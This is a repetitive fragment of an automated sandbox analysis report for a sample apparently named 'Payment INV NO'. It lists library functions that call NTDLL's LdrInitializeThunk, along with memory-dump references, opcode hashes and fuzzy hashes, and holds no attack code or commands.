                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 03390a7b9bb2395a4a1170d1b2caf9ff60d43e7a609347bc526ddd9d588734d6
                                                          • Instruction ID: 79a3e80ab9a2fefc443712401b64b416acc25b2dd173d91d68312b266bb3a221
                                                          • Opcode Fuzzy Hash: 03390a7b9bb2395a4a1170d1b2caf9ff60d43e7a609347bc526ddd9d588734d6
                                                          • Instruction Fuzzy Hash: 1E9002A120600007411571998418626808AA7E8281B51C031E5008591DC56588A17165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 17d967a-17d967f 1 17d968f-17d9696 LdrInitializeThunk 0->1 2 17d9681-17d9688 0->2
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(0180549E,000000FF,00000024,018884B8,00000004,00000000,?,?,-00000016,00000001,?,017B69F3,?,?,?), ref: 017D9694
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 08a92c74444f480e88e2991265c07959e975a1cedc093545e3f3e6b1c9520c9b
                                                          • Instruction ID: 11d2cc884645dd01cc80a80b638b2ca46eacc9df36a075b68fd57c58e0b2f065
                                                          • Opcode Fuzzy Hash: 08a92c74444f480e88e2991265c07959e975a1cedc093545e3f3e6b1c9520c9b
                                                          • Instruction Fuzzy Hash: 6AB09B719054C5C9D611D7B4460C727F95077D4745F16C061D2024645B4778C491F6B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 10 17d99a0-17d99ac LdrInitializeThunk
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(017C04C5,?,0000000F,00000000,00000000,00000010,01000000,000000FF,?,000000FF,00100021,00000018,?,00000005,00000060), ref: 017D99AA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e6953091aa562499a5620d14ec4ab7f81138c76d6530361f51b4fcc1b93a3184
                                                          • Instruction ID: 2bd8aa0a33331e9ce4ff1d50508278a6c221ce9406f8bdc02053309382ff11e4
                                                          • Opcode Fuzzy Hash: e6953091aa562499a5620d14ec4ab7f81138c76d6530361f51b4fcc1b93a3184
                                                          • Instruction Fuzzy Hash: 969002A134500446D11061998418B164085E7E9381F51C025E5058555DC659CC627166
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7 17d9710-17d971c LdrInitializeThunk
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(017AA409,000000FA,00000001,?,00000050,?,?), ref: 017D971A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 06d91941651760f59575f0e07ba947510064186e37caf59dbdf929698ab8d92e
                                                          • Instruction ID: d5864086e9ea817da80cdae5bec453e6b556a6e854f36ab94e213d2c7c9c131f
                                                          • Opcode Fuzzy Hash: 06d91941651760f59575f0e07ba947510064186e37caf59dbdf929698ab8d92e
                                                          • Instruction Fuzzy Hash: 5190027120500406D11065D9940C6564085A7E8381F51D021A9018556EC6A588A17171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 9 17d97a0-17d97ac LdrInitializeThunk
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(017A8217,000000FF,?,?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00800000,00000000,00000000,0177119C,00000001), ref: 017D97AA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5f0c0c9de8daa6ec43ab758575e55e1bd96c011547d1eb7be2f943363b27265a
                                                          • Instruction ID: fbe74a39773e46adf2d8d11d9940c863401173aef185d4f49e8973885a7ce09b
                                                          • Opcode Fuzzy Hash: 5f0c0c9de8daa6ec43ab758575e55e1bd96c011547d1eb7be2f943363b27265a
                                                          • Instruction Fuzzy Hash: D190026130500007D1507199941C6168085F7E9381F51D021E4408555CD95588667262
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 8 17d9780-17d978c LdrInitializeThunk
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(017A819C,?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00800000,00000000,00000000,0177119C,00000001,?,00000000), ref: 017D978A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ccab723e837f06b93b909e1957794bdb322cbb48c362a50309d06e6ac345c18d
                                                          • Instruction ID: dce0d94a66dc7a8dd900f6260010872befa560d9cb052b4accc8642f30dcbd7d
                                                          • Opcode Fuzzy Hash: ccab723e837f06b93b909e1957794bdb322cbb48c362a50309d06e6ac345c18d
                                                          • Instruction Fuzzy Hash: B690026921700006D1907199940C61A4085A7D9282F91D425A4009559CC95588797361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5 17d9660-17d966c LdrInitializeThunk
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(017B6A4D,000000FF,00000000,00000000,?,00002000,00000000,?,?,?), ref: 017D966A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4d7a0e7994421b0017c347b3768cefb94d93a994378d722a8540cff2a998de8d
                                                          • Instruction ID: 3ea3ae69b7614fcc1549b992a9a1935254b840bb207e27391bba92f218bfb7e0
                                                          • Opcode Fuzzy Hash: 4d7a0e7994421b0017c347b3768cefb94d93a994378d722a8540cff2a998de8d
                                                          • Instruction Fuzzy Hash: CD90027120500806D1907199840865A4085A7D9381F91C025A4019655DCA558A6977E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 11 17d9a00-17d9a0c LdrInitializeThunk
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(017FFCCB,000000FF,?,?,00000000,00000000,017CA1C1,?,00000000,00000000,00000000,017C16C5,?,?,?,01792E92), ref: 017D9A0A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
